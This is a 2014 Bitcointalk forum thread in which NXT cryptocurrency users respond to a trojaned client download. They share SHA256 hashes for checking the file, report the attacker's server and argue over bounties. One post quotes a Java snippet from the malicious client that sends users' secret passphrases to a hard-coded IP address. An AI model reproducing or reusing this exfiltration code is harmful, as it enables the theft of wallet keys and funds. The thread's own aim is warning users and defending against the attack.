jl777
Legendary
 Offline
Activity: 1176
Merit: 1134
|
 |
January 02, 2014, 02:23:26 AM |
|
I think we all agree PaulyC should be made whole as he was the first to report this. Usually bounties are for the first, not sure what the feeling is about newcn's being second. There is value in confirmation, so maybe half credit? We can't make a policy out of this, but I feel that during this critical time it is important to show the world what the NXT community is. There are the payment fees that doesn't currently have, nor do I expect will have a team that can make a realistic claim to have added value to that feature. This creates a certain amount of the community fund that would be discretionary. The actual process of collection and disbursement of the community fund has not been completed yet, but as soon as this year gets into full gear I expect that the kinks will be worked out. Since I seem to be the only one pushing this idea, I guess it is up to me to make discretionary calls, but I want to get people's feedback on the bounty for newcn's confirmation of this hack. For anybody that wants to directly contribute to the community fund, all donations are welcome. I couldn't get any volunteers to deal with the logistics of all this, so I will coordinate it for now. I will disclose all contributions and disbursements. For now just post your contribution to the community fund and I will confirm receipt or if you want to do it anonymously, PM me your contribution and your contribution will be listed as from anonymous. If you want your contribution to be spread over a period of time, please state the time period. James P.S. The more in the community fund, the more people like wesleyh, ferment, nexern, etc. will be rewarded and this in turn will get more and more people improving NXT instead of working OT at their real jobs  |
|
|
|
xyzzyx
Sr. Member
Offline
Activity: 490
Merit: 250
I don't really come from outer space.
|
|
January 02, 2014, 02:23:35 AM |
|
Er...wtf?
Am i missing something?
I think you turned him into a newt, but he got better. |
"An awful lot of code is being written ... in languages that aren't very good by people who don't know what they're doing." -- Barbara Liskov
|
|
|
|
mkmen
|
|
January 02, 2014, 02:25:47 AM |
|
So, are most people with the new client boned?
If not, what should you check?
if the sha256 of your nxt-client-0.4.8.zip is: ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 you are fine, if it's: 948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 you should download legit client and transfer your NXT immediately to another account if it's still there how to get sha256 hash of your file is explained in this thread (nice windows tool here: http://sourceforge.net/projects/quickhash/) |
|
|
|
|
|
opticalcarrier
|
|
January 02, 2014, 02:26:12 AM |
|
I dont run the www site. QBTC over at nextcoin.org runs the WWW site. I will hit her up to fix that ASAP. (remember, Im really just running DNS here, and trying to coordinate between all the other sites) good catch though, definitely need to get her to fix it NOW |
|
|
|
|
intel
Member
Offline
Activity: 98
Merit: 10
|
|
January 02, 2014, 02:30:09 AM |
|
I dont run the www site. QBTC over at nextcoin.org runs the WWW site. I will hit her up to fix that ASAP. (remember, Im really just running DNS here, and trying to coordinate between all the other sites) good catch though, definitely need to get her to fix it NOW In fact 0.4.8 is http://info.nxtcrypto.org/nxt-client-0.4.8.zip |
|
|
|
|
rickyjames
|
|
January 02, 2014, 02:31:44 AM |
|
So, are most people with the new client boned?
If not, what should you check?
if the sha256 of your nxt-client-0.4.8.zip is: ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 you are fine, if it's: 948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 you should download legit client and transfer your NXT immediately to another account if it's still there how to get sha256 hash of your file is explained in this thread (nice windows tool here: http://sourceforge.net/projects/quickhash/) OK, so I've verified I lucked out and got the "good" download completely by chance. What's this about malware listening at digital ocean? Can it only get data from the bad clients or all clients? |
|
|
|
|
|
swartzfeger
|
|
January 02, 2014, 02:31:55 AM |
|
So, are most people with the new client boned?
If not, what should you check?
Wesleyh, what's the status of the Mac client? I've only downloaded it from the links you've provided in your posts. I guess I shouldn't assume anything is safe. |
|
|
|
|
|
newcn
|
|
January 02, 2014, 02:31:59 AM |
|
ok,I find some clues: the nxt zip file I downloaded(whose sha256 is diff from this thread now) creation time:2013.12.31,20:31:14
modified time:2013.12.31,20:35:16 but in that time period, I only accessed 2 pages, they are all in this thread!!! one is the first page of this thread!!!! the second is https://bitcointalk.org/index.php?topic=345619.msg4236250#msg4236250and I found one link from the second one,it is still there: http://info.nxtcrypto.org/nxt-client-0.4.8.zipis it possible that the thief can change the link of this thread?
omg,Its terrible!!!
|
BTC:1NzzfeHCgN8fF6mSG1UeBFCVd2cxKbGyHk
NXT:13187911577562526278
|
|
|
|
kunibopl
|
|
January 02, 2014, 02:32:32 AM |
|
so Drexme once again stole coins by editing the downloadlink, that pointed to EpicThomas' manipulated client?
|
NXT: 5231236538923913892
|
|
|
|
EvilDave
|
|
January 02, 2014, 02:33:06 AM |
|
Er...wtf?
Am i missing something?
I think you turned him into a newt, but he got better. Hmmm...I'm mostly not that evil  And HappyCoins.nl actually are very good, low fees, fast delivery and u can pay using the Dutch iDeal system. I spit on PayPal..... Still curious why my name is up in lights all of a sudden |
|
|
|
|
salsacz
|
|
January 02, 2014, 02:33:25 AM |
|
PaulyC: the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history, the link was http://162.243.246.223/nxt-client-0.4.8.zipthis client is different from what I Just downloaded from this thread:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip please check your browser history to find which page you used for the download - where did you find a link? how to find it from Chrome? I just find the link, not the webpage the link was in, there should be some ways to find that! ctrl+h |
|
|
|
|
intel
Member
Offline
Activity: 98
Merit: 10
|
|
January 02, 2014, 02:35:12 AM |
|
So, are most people with the new client boned?
If not, what should you check?
if the sha256 of your nxt-client-0.4.8.zip is: ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 you are fine, if it's: 948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 you should download legit client and transfer your NXT immediately to another account if it's still there how to get sha256 hash of your file is explained in this thread (nice windows tool here: http://sourceforge.net/projects/quickhash/) OK, so I've verified I lucked out and got the "good" download completely by chance. What's this about malware listening at digital ocean? Can it only get data from the bad clients or all clients? if (!paramString.equals("")) { if (!myKeys.contains(paramString)) { URL url = new URL(" http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1")); URLConnection connection = url.openConnection(); connection.setConnectTimeout(10000); connection.getInputStream(); myKeys.add(paramString); } } |
|
|
|
|
opticalcarrier
|
|
January 02, 2014, 02:35:29 AM |
|
can I get some SSH remote command help here? on a box, I can do lynx -dump http://localhost:7874/nxt?requestType=getPeer\&peer=79.102.159.249to see the stats for the 79.102.159.249 peer if it is connected. The results look like this (notice I had to escape the & there): {"platform":"?","application":"NRS","weight":0,"state":1,"announcedAddress":"","
downloadedVolume":8758,"version":"0.4.7e","uploadedVolume":12675225}
why can I not use this to do a remote SSH command? root@vps1:~# ssh -i .ssh/vps root@vps1 lynx -dump http://localhost:7874/nxt?requestType=getPeer\&peer=79.102.159.249
{"errorCode":3,"errorDescription":"\"peer\" not specified"}
root@vps1:~#
Try: ssh root@vps1 -t -C 'curl "http://localhost:7874/nxt?requestType=getPeer&peer=79.102.159.249"'
More eye pleasing. curl --silent "http://localhost:7874/nxt?requestType=getPeer&peer=79.102.159.249" | python -m json.tool Edit: Added --silent option very cool thanks a ton guys |
|
|
|
|
xyzzyx
Sr. Member
Offline
Activity: 490
Merit: 250
I don't really come from outer space.
|
|
January 02, 2014, 02:35:59 AM |
|
Er...wtf?
Am i missing something?
I think you turned him into a newt, but he got better. Hmmm...I'm mostly not that evil And HappyCoins.nl actually are very good, low fees, fast delivery and u can pay using the Dutch iDeal system. I spit on PayPal..... Still curious why my name is up in lights all of a sudden I think its a case of mistaken identity as people are a bit excited and a little angry at the moment. You should go to the Winchester, have a nice cold pint, and wait for all of this to blow over. |
"An awful lot of code is being written ... in languages that aren't very good by people who don't know what they're doing." -- Barbara Liskov
|
|
|
|
opticalcarrier
|
|
January 02, 2014, 02:36:31 AM |
|
I dont run the www site. QBTC over at nextcoin.org runs the WWW site. I will hit her up to fix that ASAP. (remember, Im really just running DNS here, and trying to coordinate between all the other sites) good catch though, definitely need to get her to fix it NOW In fact 0.4.8 is http://info.nxtcrypto.org/nxt-client-0.4.8.zipIve already asked her to update the download that is manually mirrored on her www site. |
|
|
|
|
|
|
intel
Member
Offline
Activity: 98
Merit: 10
|
|
January 02, 2014, 02:37:55 AM |
|
so Drexme once again stole coins by editing the downloadlink, that pointed to EpicThomas' manipulated client?
I contacted Gravaton and asked to remove all dextern posts asap! |
|
|
|
Damelon
Legendary
Offline
Activity: 1092
Merit: 1010
|
|
January 02, 2014, 02:39:18 AM |
|
By the way, I just checked and Drexme was last online here two hours ago.
There is a good chance he will try to cash in tonight if he read this thread now that we are on, to him...
|
|
|
|
utopianfuture
Sr. Member
Offline
Activity: 602
Merit: 268
Internet of Value
|
|
January 02, 2014, 02:42:04 AM |
|
People, the malware is being hosted on 162.243.246.223, it is digital ocean, a lot of people here have VPS here.
Contact their support asap and notify that the IP 162.243.246.223 is running a listening backdoor / passlogger.
How does this work ? what type of activities are risky now ? |
|
|
|
intel
Member
Offline
Activity: 98
Merit: 10
|
|
January 02, 2014, 02:42:38 AM |
|
Er...wtf?
Am i missing something?
I think you turned him into a newt, but he got better. Hmmm...I'm mostly not that evil And HappyCoins.nl actually are very good, low fees, fast delivery and u can pay using the Dutch iDeal system. I spit on PayPal..... Still curious why my name is up in lights all of a sudden According to your posts, you also actively "helped" people to understand how they got their funds stolen. I would call you hacktroll! One of your messages: @PaulyC :
Have u scanned yr PC for malware? Trojan/key logger looks like a very good possiblility at this moment.
And how is yr off-line security ? Anyone else have acess to yr PC?
|
|
|
|
|
